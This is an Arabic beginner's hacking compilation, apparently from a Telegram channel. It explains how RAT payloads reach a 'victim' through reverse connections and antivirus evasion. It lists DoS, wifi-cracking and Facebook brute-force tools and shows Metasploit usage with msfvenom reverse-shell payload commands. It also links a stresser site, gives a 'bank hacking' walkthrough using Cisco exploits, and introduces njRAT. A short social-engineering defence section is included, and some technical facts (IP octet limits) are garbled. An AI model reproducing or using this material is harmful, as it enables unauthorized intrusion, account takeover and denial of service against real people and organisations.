Telegram Web Link
(اساسيات اختراق الاجهزة)

اولا اختراق الجهزة بشكل بسيط هو دخول الحاسوب الشخصي من دون علم صاحب الجهاز
ويمكن انضع اختراق الاجهزة ف نوعين:-
اختراق عن طريق المنافذ:
وهذا النوع من الاخترتق يكون من دون استخدام ادوات وبرامج
و هي منافذ تتيح للهكر الدخول والتسللل لجهاز الضحيه
مثل منفذ 21 المخصص للـftp )file transfeer protcol)
ومنفذ 23 المخصص للـ(telnet)
ومنافذ كثيرة
وهذا النوع من الاختراق يعتمد بشكل اساسي على ip والاي بي بشكل سريع هي بطاقة تعريف بك على شبكة الانترنت متل المركبات
فكل مركبه تسير برقم لايجوز للاخرى مشابهتها بالرقم وهو على نوعين:
ip static : الاي بي الداخلي للجهاز الذي يتعامل به مع الاجهزة الاخرى معه على نفس الشبكه
ip public :هو الاي بي الخارجي (العالمي) للجهاز على شبكة الانترنت
والنوع الاخر من الاختراق يعتمد على الخادم (server) يرسل للجهاز الضحيه وهو على نوعين::
انواع الاختراق:: اختراق عـــــــــادي
ويكون مباشرة ما بين جهازك وجهاز الضحية دون وساطة:::تقوم انت بارسال الباتش الى الضحية<<<يقوم الضحية بتشغيل الباتش <<<يقوم الباتش بارسال بيانات الضحية الى عنوان جهازكip
من ضمنها عنوان جهاز الضحية الـip وليخبرك انه على استعداد كامل لتلقي الاوامر (وصول التبليغ)
<<<تقوم انت بارسال اوامر بواسطة برنامج التجسس الى الباتش عن طريق عنوان جهاز الضحية
<<<يقوم الباتش بتلقي الاوامر وتنفيذها ثم يقوم بارسال الناتج اليك وهكذا تستمر الدورة....


متطلبات هذا الاختراق:_

1)-برنامج اختراق:-ويجب ان تعلم كيف تتعامل مع البرنامج ككل...كيف تصنع باتش باعدادات صحيحة
وكيف تتعامل مع اوامر البرنامج بعد وصول الباتش الى الضحية.

2)-فتح بورت في جهازك:-حيث يتم فتح بورت حيث بورت برنامج التجسس المستخدم ,,, مثل البويزون 3460 والبيفورست 81 ..
3)-فتح بورت في المودم ..

4)-تثبيت الـاي بي بتاعك في المودم..

ثم ياتي بعد ذلك تشفير الباتش من برامج الحماية ,,, وكيف ستخدع الضحية عن طريق الدمج مع ملف اخر او حقن او تلغيم الصفحة وغير ذلك...


اختراق عكـــــــــسي
آلية الاتصال العكسي:-
الاتصال العكسي:-هو نقل المعلومات من جهاز لآخر مباشرة عن طريق الاي بي::
*)-ماذا يقصد بنقل البيانات مباشرة من جهاز لآخر مباشرة عن طريق الاي بي؟؟؟
الجميع يعلم ان الانترنت هو عبارة عن شبكة عالمية تتصل بها الاجهزة بطريقة عشوائية على الشبكة
ولكل جهاز عنوان مميز له على هذه الشبكه يسمى الاي بي ...

في لحظة تشغيل الباتش على جهاز الضحية يقوم الباتش بارسال عنوان جهاز الضحية الاي بي على شبكة الانترنت الى المخترق حتى يقوم بالاتصال به.
ولكن المشكله التي واجهت تلك الخطوه هو تغير الاي بي الخاص بالاجهزة على شبكة الانترنت بطريقة دينماكيه عند كل انقطاع اتصال الجهاز بالانترنت واعادة الاتصال..
ولذلك نقوم بستخدام الشركات الداعمه للاتصال العكسي مثل الـ no-ip و الـ dyndmo فكرة علهم هي تكوين هوست نايم خاص بك.
هذا الهوست يحتوي على معلومات الاي بي الحالية لجهازك والذي يقوم البرنامج الذي قمت بتنصيبه بجهازك بتزويده برقم الاي بي الحالي لجهازك في حالة اي تغيير يطرأ عليه ..
لذى تاتي اليه ايصال المعلومات من جهاز الضحية الى جهاز المخترق في الشكل النهائي::
جهاز الضحية:يقوم الباتش بارسال عنوان جهاز الضحية الاي بي الى الهوست النو اي بي الي قمت بتكوينه.
<<<<<
no-ip :::الهوست يقوم باستقبال البيانات المرسله اليه ويقوم باعادة توجيهها الى الا ي بي الخاص بجهازك
<<<<<<<<<<<<<<<<<
برنامج الاختراق ::يقوم برنامج الاختراق بالاتصال بجهاز الضحية عن طريق معلومات الاي بي الخاصة بجهاز الضحية ...

يرسل الباتش المعلومات للهوست الى انت كونته عن طريق الشركة والذي يقوم بتوجيه المعلومات الى جهازك مباشرة ((وبذلك يعمل الهوست اي بي ثابت لك على شبكة الانترنت))
وتسمى هذه العملية وصول التبليغ..
التبليغ::-هو وصول معلومات الاتصال بهاز الضحية الى جهاز المخترق ليتم الاتصال به والتحكم به عن بعد , لذلك يجب فتح بورت في المودم لضمان وصول التبليغ.


متطلبات الاختراق العكسي:::
1)-برنامج الاختراق..
2)-فتح بورت في جهازك..
3)-عمل اشتراك في شركة استضافة مثل النو اي بي..
4)-فتح بورت في المودم..
5)-التاكد من غلق الجدار الناري داخل النظام
Termux | Kail
اشهر الادوات المستخدمة في الاختراق
ـــــــــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_الدوس
ويحتوي علي
1-Xerxes
2-Hammer
3-Slowloris
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_الويب
1-admin-panel-finder
2-WPSeku
3-InjeCtor-SY
4-0xSQLiNJ
5-0xFinder
6-sqlmap
7-WPSploit
8-sqldump
9-Websploit
10-Xshell
11-XAttacker
12-XSStrike
13-Breacher
14-OWScan
15-xGans
16-Webdav Mass Exploit
17-Nmap
ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_اختراق_الوايفاي
1-3vilTwinAttacker
2-flux
3-routersploit
4-wifite
5-wifite2
6-wps-scripts
ــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_اختراق_الاجهزة
1-MetaSploit
2-PAYMAX
3-Routersploit
4-TXTool
5-A-Rat
6-t-shell
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_عمل_wordlist
1-mkls
2-crunch
ـــــــــــــــــــــــــــــــــــــــــــ
#قسم_كسر_كلمات_السر_واختراق_برامج_التواصل_الاجتماعي
1-Facebook Brute
2-Hydra
3-Hash Buster
4-1337Hash
5-InstaHack
6-Hashzer
7-Hunner
8-gmail_attacker
9-weeman
10-ForceJK
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_اعطاء_صلاحيات_الروت
1-Sudo
2-Ubuntu
3-Fedora
ــــــــــــــــــــــــــــــــــــــــــــــــ
#قسم_لادوات_ثانية_قوية
1-Ngrok
2-Kali Nethunter
3-Termux-Styling
4-Scriptux
5-IP-Locator
6-IPLoc
ـــــــــــــــــــــــــــــــــــــــــــــ
ماهو مشروع الميتاسبلويت؟
الميتاسبلويت Metasploit هي ليست مجرد مشروع مفتوح المصدر! بل هو مشروع يهتم بالأمن المعلوماتي عبر البحث عن الثغرات الأمنية ويساعد في اختبارات الإختراق وتطوير أنظمة كشف التسللات IDS. وأهم إنجازات هذا المشروع هو منصة ميتاسبلوت المفتوحة المصدر وهي أداة تقوم بفتح منفذ في الجهاز المستهدف بهدف اختراقه.
أنشأت ميتاسبلوت من قبل فريق HD Moore سنة 2003، كأداة شبكية محمولة مبرمجة بلغة Perl. سنة 2007 ثم أعيد برمجتها كليا بواسطة لغة Ruby. سنة 2009 . أعلن أنه وقع الإستحواذ عليها من قبل شركة Rapid7، وهي شركة أمنية تبحث عن نقاط الضعف في الأنظمة وتقدم حلول لها.
الميتاسبلويت سلاح ذو حدين
كما يمكن استعمال Metasploit للبحث عن ثغرات الأنظمة فإنه يمكن من استغلالها بطريقة غير شرعية لاختراق الانظمة المختلفة.
فهي تعتبر سلاح سواء في يد الجيد Good وللسيء Bad وللغبي Ugly

ألية العمل بالميتاسبلويت

بشكل عام يمكن تلخيص مهام مشروع الميتاسبلويت لاختراق هدف بخطوات او مراحل كالأتي
اختيار واعداد الثغرة Exploit لعمل الهجوم (باختيار واحدة من بين أكثر من 1577 ثغرة موجودة على مختلف الانظمة من وندوز، ماك أو لينكس)
التحقق من أن النظام المستهدف يمكن تطبيق الإختراق عليه (بمعنى التحقق من ان الجهاز مصاب فعليا بثغرة)
اختيار واعداد البايلود Payload (وهو برمجية ضارة يرسلها المخترق للضحية لفتح قناة تواصل وتشبه في طريقة عملها فيروس حصان طروادة أو فيروس الدودة )
اختيار طريقة لتشفير البايلود Encoding Payload لتجاوز أنظمة كشف التسللات و كتلك تخطي الأنتي فايروس Bypass AV.
المرحلة الاخيرة تنفيذ الهجمة أو تشغيل الثغرة Run Exploit.
هذه الخطوات المتبعة لتنفيذ أي هجوم عبر أي بايلود وعمل الميتاسبلوت هنا هو تسهيل عمل المخترقين. كما نذكر أن الميتاسبلوت يعمل على أغلب أنظمة Unix (تشمل لينكس والماك) والوندوز وهو متوفر بعدة لغات.

مكونات مشروع الميتاسبلويت الاساسية

يجب عليك كمبتدئ معرفة كل شيء عن هذا السلاح الفتاك حتى تمضي قدما في طريق الاحتراف
مشروع الميتاسبلويت مبني على عدة مكونات أساسية, وكل بنية تمثل مجال بحد ذاته, تابع معي رعاك الله سنذكر هذه اللبنات الأساسية باللغة الانجليزية مع ترجمة بسيطة باللغة العربية حتى تستوعب, لكن يجب عليك التعامل بالمصطلحات الانجليزية اذا أردت الاحتراف فخذ الصنعة من صانعها.

Architecture - هندسة أو مخطط المشروع
Components - المكونات
Libraries - المكتبات
Interfaces - واجهات
Modules - وحدات
Utilities - خدمات
Plugins - الإضافات

1- MSF Architecture
هي أشبه بدولة داخلها مؤسسات

2- المكونات MSF Components

مشروع الميتاسبلويت يعتمد على بعض المكونات مثل:

MSF Libraries
‏ Interfaces
‏ Modules
‏ Mixins
‏ Plugins
3- المكتبات أو MSF Libraries

تتكون هذه المكتبات من ثلاث أقسام: Rex, Core, Base
1- REX وهي اختصار لجملة Ruby Extension Library

ملحوظة: (طبعا الروبي Ruby هي لغة برمجة وقد تم برمجة بها مشروع الميتاسبلويت, و Extension Library تعني مكاتب اضافية أو امتداد)
تحتوي REX على السوكيت والبروتوكولات والتحويلات النصية وغيرها من التشفيرات وبروتوكولات الشبكة.
Sockets, protocols, text transformations و SMB و SSL و HTTP و XOR و BASE64

2- النواة (Msf::Core (Core library:
يمكن تقسيمها لقسمين:
الأول الثغرات أوالاستغلالات Exploits
وهي مختلفة مثل ثغرات موجودة بقواعد البيانات والبروتوكولاتوغيرها Oracle ,MSSQL ,FTP, HTTP, SMB
القسم الثاني هو الاضافات Auxiliary
مثل برامج الفحص Scanners وبرامج التخمين BruteForce وبرامج التبليغ Reports ...
وبرامج حجب الخدمة DOS و Fuzzers و Wireless

3- (Msf::Base (Base library :
يوفر إجراءات وفئات classes التي يمكنك استخدامها للعمل بسهولة مع النواة Core

4- واجهات المشروع Metasploit Interfaces

يتكون مشروع الميتاسبلويت من أربعة واجهات أساسية مختلفة, يمكننا عن طريق هذه الواجهات بالتعامل مع الميتاسبلويت بسهولة ومرونة

MSFconsole تمثل الواجهة الاساسية ونتعامل معها بالاوامر مثل شاشة الدوس
MSFcli تشبه التعامل مع السكريبتات
MSFweb نتعامل معها عن طريق فتح متصفح الانترنت
MSFgui و Armitage من أسهل وأروع الواجهات المبرمجة بلغة الجافا القوية , وهي تأتي مع نظام الكالي لينكس أنصح المبتدئين باستعمالها و بشدة. ولكن هذا لا يعني اهمال msfconsole

5- الوحدات MSF Modules

تتكون الوحدات من عدة برامج وسكريبتات مهمة مثل:
Exploit
Auxiliary
Post-Exploitation
Payload
NOP generator
Payload encoder
6- الخدمات والادوات MSF Utilities
هناك ثلاث أدوات رئيسية مهمة مثل :
MSFpayload
ويمكنك تشبيهه بالسيرفر أو التروجان الذي نرسله للضحية بق
اولا ح نتعرف على بعض الاوامر في الميتا ونعرف كل واحد واستخداماته

1/ show   يعني عرض او اظهر لي

2/ use  يعني إستخدام او فعل لي

3/ options يعني الخيارات او المتطلبات

4/ sessions يعني الجلسات او الجلسه المفتوحه

5/exploit يعني إستغلال او استغل هذا الشئ

6/search بحث ودي لو انت عارف ثغرة او بيلود مسبقا وداير تباشر في العمليه طوالي من غير الخطوات السابقه

طبعا دي أهم الاوامر الني سوف نحتاج لها في عملية الإختراق عن طريق الميتا

نجي  لي استخدام الامر حسب الترتيب او الحاجه

اولا عشان نعرض الثغرات او البيلودات المتاحه في الميتا ح نستخدم الامر  show ونكتب الحاجه الحابين نعرضها
مثال

show payloads

ننتظر حتى يعرض لينا البايلودات المتوفره


ونجي لي استخدام الامر use
عشان نبدأ عملية الإختراق
مثال 
بعد عرضنا البايلودات خلونا نقول جاب لينا نتيجه وحده وهي :

android/reverce/tcp

ح نكتب الآتي:
use android/reverce/tcp

وبعدها ح نجي لي الامر ال options

نكتب فقط 
options

وهنا ح يجيب لينا المعلومات المطلوبه لعمليه الإختراق

غالبآ بطلب منك حاجتين  الهوست  والبورت
وح نكتب مثال :
set RHOST 127.0.0.1
انتر وبعدو نكتب البورت الفاتح
مثال :
set RPORT 4444

بعد كده نجي لي امر exploit

ونكتبه مباشر  بعد الخطوات السابقة
exploit

وح تبدأ معاك عملية الإختراق

وح نكتب الامر  sessions عشان نعرض الجلسه ونشوف عندنا كم ضحيه متصل
استغلالات الميتا سبلويت

تكوين بايلود يخترق لينكس :

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

⇐ تكوين بايلود يخترق ويندوز :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

⇐ تكوين بايلود يخترق السيرفرات بصيغة بلغة php :

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo  <?php   | tr -d 
  > shell.php && pbpaste >> shell.php

⇐ تكوين بايلود يخترق السيرفرات بصيغة بلغة asp :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

⇐ تكوين بايلود يخترق السيرفرات بصيغة بلغة jsp :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

⇐ تكوين بايلود يخترق السيرفرات بصيغة بلغة war :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

⇐ تكوين بايلود بلغة بايثون :

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

⇐ تكوين بايلود بلغة باش :

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
مامعنى بايلود
كلمة بيلود ( Payload ) معناها التحميل الزائد باللغة العربية.

في مجال الشبكات معناها البيانات التي يستقبلها المستخدم بدون البيانات التي تكون موضوعة في هيدر الباكيت.

في مجال الأمن المعلوماتي تعني هو برمجية خبيثة يرسلها المخترق للضحية لفتح نافذه تواصل ( بورت ) بين الطرفين
*ماذا أفعل عند الوقوع ضحية للهندسة الاجتماعية؟!*
عادة يترافق الهجوم بأساليب الهندسة الاجتماعية بهجوم آخر ببرمجيات خبيثة مثلا. لذلك عندما يقع المستخدم ضحية للهندسة الاجتماعية عليه أن يقوم بخطوات تختلف
موقع لقطع الانترنت عن اي شخص في العالم عن طريق الاي بي الخاص بجهازه

https://www.stressthem.to
ماهو الايبي الشرح_ عنوان الـ IP او الايبي هو عبارة عن رقم وهو يمثل عنوان جهازك على شبكة الانترنت مثل رقم هاتفك الذي عن طريقه يستطيع الناس الأتصال بك وهكذا هو الايبي مكون من ارقام مثال : 192.168.1.3 هيك مثلا وعن طريق هذا الرقم ازا انت اعتقدته بسيط او عادي عن طريقه يستطيع الهكر تدميرك او اختراقك او التجسس عليك حسب الثغرات الموجودة بجهازك ايضا يستطيع الهكر تحديد موقعك بالتفصيل يعني اين انت بالضبط او مكانك على الخريطة يستطيع تحديد مكانك بالتفصيل الممل ومنزلك والشارع حتى يمكنه الوصول الى منزلك .... يوجد لكل جهاز على الأنترنت 2 ايبي واحد داخل الشبكة يسمى ايبي داخلي ويكون بهذا الشكل 192.168.1.1 الان ننتقل الي الايبي الثاني للجهاز وهو ايبي خارجي علي شبكة الانترنت مثل : 81.57.86.41 281.85.43.277 61.0.154.6 ويتغير هذا الرقم في كل مرة تتصل بالإنترنت ، وهو مكون من 4 خانات من الأرقام وكل خانة بها علي الاكثر 3 أرقام بحيث لا تزيد عن العدد 277 ، وهو اختصار Internet Protocol ولا غنى عنه في تنظيم الاتصال بين أجهزة الكمبيوتر على أي شبكة سواء كانت الإنترنت أو الشبكات الداخلية . كل رقم من الأرقام بالأعلى هو عنوان لجهاز كمبيوتر على الإنترنت ، وكما نلاحظ هو مكون من 4 خانات لكل خانة 3 ارقام بحيث لاتزيد عن الرقم 277 . من خلال رقم الآي بي يمكن استخلاص بعض المعلومات عن الجهاز الذي يحمل هذا العنوان ، لنأخذ مثلاً هذا العنوان 86.51.36.41 : 86 يدل على بلد الجهاز 51 يدل على الجهة المسؤولة عن الإنترنت في هذا البلد 36 يدل على شركة الإنترنت 41 يدل على رقم المشترك لدى الشركة كيف تجيب ايبي جهازك ؟ تقدر تعرف ايبي جهازك او الـ IP بطرق كثيرة منها من شاشة الدوس او عن طريق مواقع مثال : افتح هذا الموقع WhatismyIPAddress.com بمجرد فتحه سوف يخبرك برقم الآي بي الخاص بك والبلد والمدينة مع خريطة يوضح فيها موقع اتصالك بالإنترنت ، ( طبعا الأهم من ذالك ان لا تعطي عنوان الايبي او الـ IP لاي شخص كان لانه يستطيع تدميرك وعمل كما ذكرت بأول الموضوع نصيحة لا تثق بأحد بهيك اشياء او تعطيهم الايبي الخاص بك
الهندسة الاجتماعية

ما هي الهندسة الاجتماعية
يعتمد الكثير من المخترقين والقراصنة حول العالم على العنصر البشري فقط وبعيداً عن التفاعل بينه وبين الأجهزة، وهو ما يُعرف بالهندسة الاجتماعية.
وباختصار يُمكن تعريف الهندسة الاجتماعية على أنها التلاعب بالبشر وخداعهم بهدف الحصول على بيانات أو معلومات أو أموال كانت ستظل خاصة وآمنة ولا يُمكن الوصول إليها.

ومن هنا يستخدم المخترق المتحايل “المهندس الاجتماعي” مهاراته لاستهداف نقاط الضعف البشرية في محاولة للتحايل على الضوابط والإجراءات التي من شأنها أن تمنعه من الحصول على المعلومات التي يحتاجها.
*ما هي نوعية المعلومات التي يُمكن خسارتها؟*
الإجابة باختصار “كل شيء”، ففي عصر المعلومات يمكن أن يكون لأي معلومة قيمة، الشخص الذي يستهدفك أيضاً له دوافع معينة وبالتالي لا يُمكن الاستهتار بأي معلومة تخسرها.
وبالطبع فإن المخترقين الذين يعتمدون على الهندسة الاجتماعية يركزون بصورة أساسية على الخدمات المالية مثل الحسابات البنكية على الإنترنت أو أي معلومات تساعدهم في الحصول على أموال.
*كيف أحمي نفسي؟*
أولاً: النصيحة الأساسية التي تجنبك الكثير من المشاكل الأمنية، هي “لا تُشارك أبداً أي معلومات أو أي بيانات شخصية مع أي جهة كانت” وعلى الرغم من سهولة القيام بهذا الأمر إلا أن الكثير من المستخدمين يغفلون عن هذه النصيحة.
ثانياً: تحقق دائماً من الأشخاص الذين تتحدث إليهم سواءً عبر الهاتف أو عبر البريد الإلكتروني أو خدمات التواصل الفوري وغيرها، مثلاً لو كان المتصل من شركة رسمية فلا تجد حرجاً أن تطلب منه معلوماته الكاملة وأن يقوم بالاتصال من رقم هاتف رسمي يُمكن التحقق منه.
ثالثاً: لا تفتح مرفقات البريد الإلكتروني من أشخاص غير معروفين، فلغاية الآن يتم استخدام هذه الطريقة على نطاق واسع لنشر البرمجيات الخبيثة والحصول على المعلومات الشخصية، وذلك من خلال انتحال هوية شركات كبرى وإرفاق بعض الملفات في البريد.
رابعاً: اعمل على تأمين هاتفك الذكي أو حاسبك المحمول، يُمكن أن تعتمد على فلترة البريد المزعج بالاعتماد على أدوات خاصة، كذلك اعتمد على برامج قوية لمكافحة الفيروسات تتضمن أدوات لمكافحة رسائل وصفحات التصيد
*لماذا تنجح الهندسة الاجتماعية بالرغم من حذر المستخدم أحياناً؟*
الموضوع ببساطة يعتمد على استهداف الناحية النفسية للإنسان، حيث يستخدم المخترقون بعض المحفزات الأساسية للسلوك البشري مثل زرع الخوف والفضول والإلهاء والحماسة وغيرها.
فيمكن لصورة عبر البريد الإلكتروني أن تثير عواطفك للتبرع لجهة خيرية معينة بشكل مخادع، أو من خلال إثارة الخوف داخلك عبر إعلامك باختراق إحدى حساباتك وأنه يجب إعادة تعيين كلمة المرور، أو يُمكن أن يدفعك الفضول لمشاهدة هذه الصورة المضحكة أو قراءة خبر مثير جدا.
*هل أنت حريص بما فيه الكفاية؟*
حسناً، قد يدور في ذهنك الآن أنه لا يُمكن أن أنخدع بمثل هذه الأساليب الاجتماعية، لكن يجب عليك أن تعلم أن بعض المسؤولين الكبار في الشركات العالمية قد تعرضوا لمثل هذه الأنواع، فهناك طرق يتم استخدامها تفوق
عمليات النصب التي يتم استخدامها في أقوى أفلام الجريمة لذا لا تعتمد فقط على حرصك وذكائك بل تأكد من اتباعك للممارسات الأمنية الصحيحة في كل الأحوال.
*ماذا عن الشركات؟*
أظهرت دراسة أجرتها شركة فيريزون Verizon مؤخراً أن الكثير من هجمات الاحتيال والتصيد تستهدف موظفي الإدارة المالية داخل الشركات، نظراً لكونهم المشرفين على عمليات تحويل الأموال.
وربما يكفيك تأكيد شركتي جوجل وفيس بوك تعرضهم لمحاولة احتيال بقيمة 100 مليون دولار، لتعلم كيف يقوم هؤلاء المخترقين بأعمالهم على درجة عالية من الاحترافية.
لذا ينبغي على الشركات العمل على تدريب الموظفين، خصوصاً موظفي القطاع المالي،
على اتخاذ التدابير الأمنية السليمة، فالعامل البشري هو الجزء الأهم في أي نظام تتبعه مهما كان هذا النظام آمن.
*ماذا أفعل عند الوقوع ضحية للهندسة الاجتماعية؟!*
عادة يترافق الهجوم بأساليب الهندسة الاجتماعية بهجوم آخر ببرمجيات خبيثة مثلا. لذلك عندما يقع المستخدم ضحية للهندسة الاجتماعية عليه أن يقوم بخطوات تختلف تبعا لنوع الهجوم.
*ماذا أفعل عند الوقوع ضحية للهندسة الاجتماعية؟!*
عادة يترافق الهجوم بأساليب الهندسة الاجتماعية بهجوم آخر ببرمجيات خبيثة مثلا. لذلك عندما يقع المستخدم ضحية للهندسة الاجتماعية عليه أن يقوم بخطوات تختلف تبعا لنوع الهجوم.
*ماذا أفعل عند الوقوع ضحية للهندسة الاجتماعية؟!*
عادة يترافق الهجوم بأساليب الهندسة الاجتماعية بهجوم آخر ببرمجيات خبيثة مثلا. لذلك عندما يقع المستخدم ضحية للهندسة الاجتماعية عليه أن يقوم بخطوات تختلف تبعا لنوع الهجوم.
EasY_HaCk
ادات فريدة من نوعها يحتاجها كل مبتدأ او محترف في مجال امن المعلومات فهي مختصة في اختبار حماية المواقع المصابة بثغرات sql injection بمختلف أنواعها وهذا طبعا باستخدام اوامر و أدوات تساعد في كشف المعلومات حول المواقع استغلال الثغرات كشف الأرقام السرية و فك تشفيرها اختبار اختراق الأجهزة الحاسوبية و اللوحية و الهواتف بمختلف أنواعها وكثير من المميزات الرائعة التي خلال تطبيق (termux)
الأدات
pkg update

pkg upgrate

git clone https://github.com/sabri-zaki/EasY_HaCk

cd EasY_HaCk

chmod +x install.sh

bash install.sh


لإعادة تشغيل الأداة مرةأخرى
cd EasY_HaCk

bash install.sh
حصريا اختراق البنوك وأنظمة قواعد البيانات dbms

أردت ان أفيد كل هاكر محصور في أشياء صغيرة في عالم الهاكر ويريد آن يتوسع في عالم الاختراق المتقدم
الموضوع عبارة عن مقدمة في اختراق البنوك وأنظمة قواعد البيانات والمشهورة oracle التي تستخدمها البنوك والشركات .

المتطلبات والادوات للموضوع

Backtrack
Metasploit
Skills
Hacking skills
خبرة في لغة sql وقواعد البيانات
خبرة في نظام linux

لكي تستفيد من الموضوع يجب عليك قراءته كل سطر وفهمه والتركيز
ولكي تصبح متقن لأختراق في المستوى العالي يجب عليك إتقان لغة sql و oracle sql ومعرفة قوية في اوامر نظام التشغيل linux . لأن البنوك والشركات تستخدم قواعد بيانات oracle sql و sql servermicrosoft وشبكات السيسكو cisco ولكي تستطيع التحكم يجب عليك المعرفة بهذه الانظمة .

من هنا ينطلق الموضوع :

قبل أي شي في أي خطوة لأختراق نظام هي معرفة مكوناته software لأن الثغرات هي تصيب البرمجيات
وهناك طرق اخرى للأختراق من دون ثغرات مثل الدخول العنيف .طبعا شرحي سيتمركز على انظمة اوراكل لقواعد البيانات والسيسكو وكذلك بعض الثغرات . طبعا اثمن شي في البنوك والشركات هي قواعد البيانات وهذا ما سيتمركز عليه الكلام. وكيفية ايجاد الشبكات المصابة وهذا سهل سأشرحه لكم ايضا والادوات المستخدمة في الشرح هي نظام الباك تراك والميتاسبوليت .


::::الخطوة الاولى:::::::

فحص الهدف

وهي كالعادة عمل اسكان Scan عبر الايبي وهذه الخطوة تستخدم في جميع الاختراقات سواء مواقع او سيرفرات او اجهزة
طبعا في البنوك والشركات تفحص البرامج المركبة والبورتات المفتوحة وسنستخدم اداة nmap المثبتة على الباك تراك .

طبعا سوف لن اشرح الاداة لأن هذا الموضوع عبارة عن اختراق متقدم وليس شرح للمبتدئن.

فحص الهدف بالامر التالي :


Nmap –sV xx.xx.xx.xx


xx.xx.xx.xx هو عبارة عن اي بي ip الهدف .

الان عرفنا ان الهدف يستخدم نطام اوراكل oracl
وأيضا هناك سيرفرات تحتوي على نظام السيسكو
والان عرفنا الهدف من ما ذا مكون .

قبل الدخول في التطبيق سأشرح لكم انواع الانطمة .

اولا انظمة قواعد البيانات
هناك شركات صنعت DBMS والتي تدير قواعد البيانات مثل شركة ارواكل وميكروسوفت وهناك انظمة مخصصة مثل انظمة وزارة الدفاع الامريكية .

طبعا لأقتحام أي نظام يجب معرفة أول شي كيف تتصل بالنطام وماذا يريد النظام منك للأتصال
طبعا انا سأشرح النقاط الأساسية التي تمكنك من فهم اختراق الانظمة للمؤسسات والشركات .


:::::الخطوه الثانيه الاختراق:::::::

سأبدأ في اختراق شبكات السيسكو التي اغلب الشركات تعمل عليها .
طبعا لأختراق شبكات السيسكو هناك اداوت موجودة على الباك تراك
ويجب أن يكون معك نظام اختراق قوي مثل الباك تراك للهجوم من هذا النوع

نفتح الباك تراك
نفتح الشل ونتوجه للمسار التالي :
Cd /pentest/cisco/cisco-global-exploiter
طبعا توجد اداة اسمها
Cge.pl
هذه هي اداة الاختراق لشبكات السيسكو الي تستثمر عدة انواع من الثغرات مثل البفر Bofre وكذلك تعمل هجوم حجب الخدمة يعني توقيف الشبكات بالكامل .لكي تشغل الاداه تكتب الامرPerl cge.pl
طبعا استخدام الادة يكون
Perl cge.pl xx.xx.xx.xx option
نوع الهجوم Option =
بعد ماختار نوع الهجوم مثل buufer overflow
والاتصال العكسي او telnet
او أنك تختار Denial of services توقف عمل الشبكة وشلها
طبعا اهم شي انك تصل الى المعومات وهذا اهم شيء يهم المهاجم أو الهاكر .وكذلك تحاول الأتصال عكسيا مع الهدف .
الان عرفنا أهم الخطوات في بداية الاختراق
نعمل Scan للهدف لنعرف البرامج المثبتة على الهدف
ايجاد ثغرات البرامج و الانظمة
استثمار ثغرات الانظمة او البرامج المركبة
تم الاقتحام يعني وصلنا للجهاز .
الان كل ما شرحته المفروض كل هاكر يكون على علم به وأكيد لا تتوقع ان اختراق انظمة البنوك و المؤسسات والشركات بهذه السهولة ومثل أي اختراق لكن الصعوبة بعد ما تقتحم النظام . ما هي الاجراءات التي ستقوم بها .
مرحبا ! اداة Aliens-fb اداة رائعة جد للتخمين علي حسابات الفيس بوك بطريقة احترافية وفعالة جداا والاداة مصممة باللغة العربية

اوامر تتبيت لاداة وطريقة لعمل !

apt update

apt upgarde

pkg install git

pkg install python

pkg install python2

git clone https://github.com/hackermohamedPro/Aliens-fb

cd Aliens-fb

pip2 install mechanize

لان ندخل لي اداة صنع لست با لامر

python Aliens-list.py

تعطي في لاول اسم لست مع صيغة .txt

تم معلومان ضحية بعد لانتهاء اكتب Pro وضفط انتر سيتم صنع لست باسوردات حترافية

لان نشغل لاداة تانية لتخمين با لامر

python2 Aliens-fb.py

في لاول تضع id ضحية
في ثاني تضع لاسم الذي وضعتو لي لست لباسوردات

الأن سيبدأ تخمين عند لعثور على لكود سيظهر با لون لاخضر
السلام عليكم
شرح برنامج نجرات والنسخة الاصلية للتطبيق اولا اشرح بعض الاشياء عن تطبيق نجرات عشان الكل يفهم الشرح

(ماهو نجرات)

njRAT ، المعروف أيضًا باسم Bladabindi1 ، هو حصان طروادة عن بُعد أو حصان طروادة يسمح لمالك البرنامج بالتحكم في كمبيوتر المستخدم بشكل كامل. تم اكتشافه لأول مرة في يونيو 2013 مع بعض المتغيرات التي يعود تاريخها إلى نوفمبر 2012. تم إنتاجه من قبل منظمة ٠٠٠٠٠٠٠اختراق الكمبيوتر من بلدان مختلفة Sparclyheason وكان يستخدم في الغالب من اجل مراقبة حواسيب العمال. كان يستخدم مدراء الشركات في مراقبة حواسيب الموظفين هل يقومون بعمله كما هو مطلوب ام لا, لكن البرنامج تم اعادة برمجته واضافة خصيات له من طرف هكرز واصبح استخدامه في مجال الاختراق المستهدف. ويستطيع هذا البرنامج ان يولد سيرفورات قادرة على الانتشار واختراق عدد كبير من الضحايا.

(الموقع الرسمي لتطبيق نجرات')

ماهو الموقع الرسمي لبرنامج نجرات ؟ كان في السابق موقع njrat.com هو الموقع الرسمي الخاص بالبرنامج لكن بعد ان اكتشف ان هذا البرنامج يستخدم من طرف العديد من المنظمات الارهابية ويستخدم في اغراض الابتزاز والاختراق الغير الاخلاقي تم رفع العديد من القضايا ضد الموقع ومالك الموقع وقد تم اغلاق الموقع وتوقف المطورون عن اصدار اصدارات رسمية للموقع

(كيف يستخدم الهاكر برنامج نجرات )

